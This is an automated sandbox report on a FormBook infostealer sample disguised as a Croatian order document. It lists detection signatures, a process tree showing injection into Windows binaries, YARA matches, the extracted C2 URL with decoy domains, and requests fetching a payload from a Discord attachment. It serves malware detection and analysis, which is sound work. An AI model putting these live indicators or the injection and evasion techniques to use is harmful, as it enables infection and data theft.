Loading ...

Play interactive tourEdit tour

Windows Analysis Report Nova narudzba u prilogu.exe

Overview

General Information

Sample Name:Nova narudzba u prilogu.exe
Analysis ID:553139
MD5:97d7bf836142b0ebb1ebfc1a4173dc9d
SHA1:dc734d5d74bee644fb1028ede0adcd34be3f98f8
SHA256:feb40c343aa65f5f5c0a32443535effa22652067c576416857e4d7280ce85e11
Tags:exeFormbookgeoHRV
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Writes to foreign memory regions
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Nova narudzba u prilogu.exe (PID: 7148 cmdline: "C:\Users\user\Desktop\Nova narudzba u prilogu.exe" MD5: 97D7BF836142B0EBB1EBFC1A4173DC9D)
    • DpiScaling.exe (PID: 6104 cmdline: C:\Windows\System32\DpiScaling.exe MD5: 302B1BBDBF4D96BEE99C6B45680CEB5E)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • Ajshkennyc.exe (PID: 6912 cmdline: "C:\Users\user\Contacts\Ajshkennyc.exe" MD5: 97D7BF836142B0EBB1EBFC1A4173DC9D)
          • DpiScaling.exe (PID: 2240 cmdline: C:\Windows\System32\DpiScaling.exe MD5: 302B1BBDBF4D96BEE99C6B45680CEB5E)
        • Ajshkennyc.exe (PID: 6980 cmdline: "C:\Users\user\Contacts\Ajshkennyc.exe" MD5: 97D7BF836142B0EBB1EBFC1A4173DC9D)
          • logagent.exe (PID: 5752 cmdline: C:\Windows\System32\logagent.exe MD5: E2036AC444AB4AD91EECC1A80FF7212F)
        • colorcpl.exe (PID: 5364 cmdline: C:\Windows\SysWOW64\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)
          • cmd.exe (PID: 5028 cmdline: /c del "C:\Windows\SysWOW64\DpiScaling.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 2208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • explorer.exe (PID: 6744 cmdline: "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msdt.exe (PID: 1836 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.finetipster.com/pvxz/"], "decoy": ["imt-token.club", "abravewayocen.online", "shcloudcar.com", "mshoppingworld.online", "ncgf08.xyz", "stuinfo.xyz", "wesavetheplanetofficial.com", "tourbox.xyz", "believeinyourselftraining.com", "jsboyat.com", "aaeconomy.info", "9etmorea.info", "purosepeti7.com", "goticketly.com", "pinkmemorypt.com", "mylifewellnesscentre.com", "iridina.online", "petrestore.online", "neema.xyz", "novelfooditalia.com", "enterprisedaas.computer", "tzkaxh.com", "brainfarter.com", "youniquegal.com", "piiqrio.com", "mdaszb.com", "boldmale.com", "era636.com", "castleinsuranceco.com", "woodennickelmusicfortwayne.com", "customer-servis-kredivo.com", "high-clicks.com", "greetwithgadgets.com", "hfsd1.com", "insureagainstearthquakes.net", "ultimatejump.rest", "parivartanyogeshstore.com", "handmanagementblog.com", "meishangtianhua.com", "michaelscottinsurance.net", "kershoes.com", "atomiccharmworks.com", "conciergecompare.com", "zeal-hashima.com", "coachianscott.com", "hwkm.net", "019skz.xyz", "jardingenesis.com", "sumikkoremon.com", "tjpengyun.com", "sectionpor.xyz", "46t.xyz", "sa-pontianak.com", "localproperty.team", "dotexposed.com", "cis136-tgarza.com", "eiestilo.com", "youknowhowtolive.com", "phalcosnusa.com", "qaticv93iy.com", "hbjngs.com", "ocean-nettoyage.com", "jenuwinclothes.net", "anadoluatvoffroad.com"]}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\Contacts\cynnekhsjA.urlMethodology_Shortcut_HotKeyDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x58:$hotkey: \x0AHotKey=2
  • 0x0:$url_explicit: [InternetShortcut]
C:\Users\user\Contacts\cynnekhsjA.urlMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000000.810820140.0000000072480000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000F.00000000.810820140.0000000072480000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19b87:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000F.00000000.810820140.0000000072480000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ab9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bcc:$sqlite3step: 68 34 1C 7B E1
    • 0x16ae8:$sqlite3text: 68 38 2A 90 C5
    • 0x16c0d:$sqlite3text: 68 38 2A 90 C5
    • 0x16afb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c23:$sqlite3blob: 68 53 D8 7F 8C
    00000010.00000002.980408969.0000000002C60000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000010.00000002.980408969.0000000002C60000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19b87:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 70 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      15.0.DpiScaling.exe.72480000.2.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        15.0.DpiScaling.exe.72480000.2.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19b87:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        15.0.DpiScaling.exe.72480000.2.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16ab9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bcc:$sqlite3step: 68 34 1C 7B E1
        • 0x16ae8:$sqlite3text: 68 38 2A 90 C5
        • 0x16c0d:$sqlite3text: 68 38 2A 90 C5
        • 0x16afb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c23:$sqlite3blob: 68 53 D8 7F 8C
        5.0.DpiScaling.exe.72480000.3.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.0.DpiScaling.exe.72480000.3.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18d87:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 85 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Possible Applocker BypassShow sources
          Source: Process startedAuthor: juju4: Data: Command: C:\Windows\SysWOW64\msdt.exe, CommandLine: C:\Windows\SysWOW64\msdt.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\msdt.exe, NewProcessName: C:\Windows\SysWOW64\msdt.exe, OriginalFileName: C:\Windows\SysWOW64\msdt.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3424, ProcessCommandLine: C:\Windows\SysWOW64\msdt.exe, ProcessId: 1836

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 0000000F.00000000.810820140.0000000072480000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.finetipster.com/pvxz/"], "decoy": ["imt-token.club", "abravewayocen.online", "shcloudcar.com", "mshoppingworld.online", "ncgf08.xyz", "stuinfo.xyz", "wesavetheplanetofficial.com", "tourbox.xyz", "believeinyourselftraining.com", "jsboyat.com", "aaeconomy.info", "9etmorea.info", "purosepeti7.com", "goticketly.com", "pinkmemorypt.com", "mylifewellnesscentre.com", "iridina.online", "petrestore.online", "neema.xyz", "novelfooditalia.com", "enterprisedaas.computer", "tzkaxh.com", "brainfarter.com", "youniquegal.com", "piiqrio.com", "mdaszb.com", "boldmale.com", "era636.com", "castleinsuranceco.com", "woodennickelmusicfortwayne.com", "customer-servis-kredivo.com", "high-clicks.com", "greetwithgadgets.com", "hfsd1.com", "insureagainstearthquakes.net", "ultimatejump.rest", "parivartanyogeshstore.com", "handmanagementblog.com", "meishangtianhua.com", "michaelscottinsurance.net", "kershoes.com", "atomiccharmworks.com", "conciergecompare.com", "zeal-hashima.com", "coachianscott.com", "hwkm.net", "019skz.xyz", "jardingenesis.com", "sumikkoremon.com", "tjpengyun.com", "sectionpor.xyz", "46t.xyz", "sa-pontianak.com", "localproperty.team", "dotexposed.com", "cis136-tgarza.com", "eiestilo.com", "youknowhowtolive.com", "phalcosnusa.com", "qaticv93iy.com", "hbjngs.com", "ocean-nettoyage.com", "jenuwinclothes.net", "anadoluatvoffroad.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: Nova narudzba u prilogu.exeReversingLabs: Detection: 32%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 15.0.DpiScaling.exe.72480000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.DpiScaling.exe.72480000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DpiScaling.exe.72480000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.DpiScaling.exe.72480000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DpiScaling.exe.72480000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.DpiScaling.exe.72480000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DpiScaling.exe.72480000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DpiScaling.exe.72480000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DpiScaling.exe.72480000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.DpiScaling.exe.72480000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.DpiScaling.exe.72480000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.DpiScaling.exe.72480000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.2.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DpiScaling.exe.72480000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.2.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.DpiScaling.exe.72480000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000000.810820140.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.980408969.0000000002C60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.826394913.0000000004B90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.772008503.000000000E9DF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.714097353.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.979059154.0000000000800000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.749509351.000000000E9DF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000000.836253520.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.860879140.0000000000E90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000000.810315428.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.864516356.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000000.811363392.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.714755943.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.860188435.0000000000E60000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.844946988.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.714442633.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.980367511.0000000002C30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000000.811926457.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.713760138.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.826540547.0000000004BF0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.830080872.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000000.835723366.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.863247728.0000000003280000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000000.836796283.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000000.837305764.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Multi AV Scanner detection for domain / URLShow sources
          Source: www.finetipster.com/pvxz/Virustotal: Detection: 5%Perma Link
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\Contacts\Ajshkennyc.exeVirustotal: Detection: 27%Perma Link
          Source: C:\Users\user\Contacts\Ajshkennyc.exeReversingLabs: Detection: 32%
          Machine Learning detection for sampleShow sources
          Source: Nova narudzba u prilogu.exeJoe Sandbox ML: detected
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\Contacts\Ajshkennyc.exeJoe Sandbox ML: detected
          Source: 26.2.explorer.exe.bc3796c.1.unpackAvira: Label: TR/Patched.Ren.Gen8
          Source: 15.0.DpiScaling.exe.72480000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 15.0.DpiScaling.exe.72480000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.DpiScaling.exe.72480000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 20.0.logagent.exe.72480000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 16.2.colorcpl.exe.2a94670.1.unpackAvira: Label: TR/Patched.Ren.Gen8
          Source: 20.0.logagent.exe.72480000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 15.0.DpiScaling.exe.72480000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.DpiScaling.exe.72480000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.DpiScaling.exe.72480000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 26.0.explorer.exe.bc3796c.1.unpackAvira: Label: TR/Patched.Ren.Gen8
          Source: 20.0.logagent.exe.72480000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 16.2.colorcpl.exe.4ce796c.4.unpackAvira: Label: TR/Patched.Ren.Gen8
          Source: 20.0.logagent.exe.72480000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 15.0.DpiScaling.exe.72480000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.DpiScaling.exe.72480000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 15.2.DpiScaling.exe.72480000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 20.2.logagent.exe.72480000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.2.DpiScaling.exe.72480000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Nova narudzba u prilogu.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
          Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.4:49774 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.4:49778 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49779 version: TLS 1.2
          Source: Binary string: colorcpl.pdbGCTL source: DpiScaling.exe, 00000005.00000002.829989653.00000000053A0000.00000040.00020000.sdmp
          Source: Binary string: colorcpl.pdb source: DpiScaling.exe, 00000005.00000002.829989653.00000000053A0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: DpiScaling.exe, 00000005.00000002.827879975.000000000504F000.00000040.00000001.sdmp, DpiScaling.exe, 00000005.00000002.827366166.0000000004F30000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: DpiScaling.exe

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.finetipster.com/pvxz/
          Source: Joe Sandbox ViewIP Address: 162.159.135.233 162.159.135.233
          Source: Joe Sandbox ViewIP Address: 162.159.135.233 162.159.135.233
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
          Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
          Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
          Source: global trafficHTTP traffic detected: GET /attachments/909752051695775778/931434691809124392/Ajshkennychvrlvyqvxklxbhfqfzgvr HTTP/1.1User-Agent: lValiHost: cdn.discordapp.com
          Source: global trafficHTTP traffic detected: GET /attachments/909752051695775778/931434691809124392/Ajshkennychvrlvyqvxklxbhfqfzgvr HTTP/1.1User-Agent: 88Host: cdn.discordapp.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /attachments/909752051695775778/931434691809124392/Ajshkennychvrlvyqvxklxbhfqfzgvr HTTP/1.1User-Agent: 42Host: cdn.discordapp.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /attachments/909752051695775778/931434691809124392/Ajshkennychvrlvyqvxklxbhfqfzgvr HTTP/1.1User-Agent: 60Host: cdn.discordapp.comCache-Control: no-cache
          Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.4:49774 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.4:49778 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49779 version: TLS 1.2

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 15.0.DpiScaling.exe.72480000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.DpiScaling.exe.72480000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DpiScaling.exe.72480000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.DpiScaling.exe.72480000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DpiScaling.exe.72480000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.DpiScaling.exe.72480000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DpiScaling.exe.72480000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DpiScaling.exe.72480000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DpiScaling.exe.72480000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.DpiScaling.exe.72480000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.DpiScaling.exe.72480000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.DpiScaling.exe.72480000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.2.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DpiScaling.exe.72480000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.2.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.DpiScaling.exe.72480000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000000.810820140.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.980408969.0000000002C60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.826394913.0000000004B90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.772008503.000000000E9DF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.714097353.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.979059154.0000000000800000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.749509351.000000000E9DF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000000.836253520.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.860879140.0000000000E90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000000.810315428.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.864516356.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000000.811363392.0000000072480000.00000040.00000001.sdmp, type: MEMORY
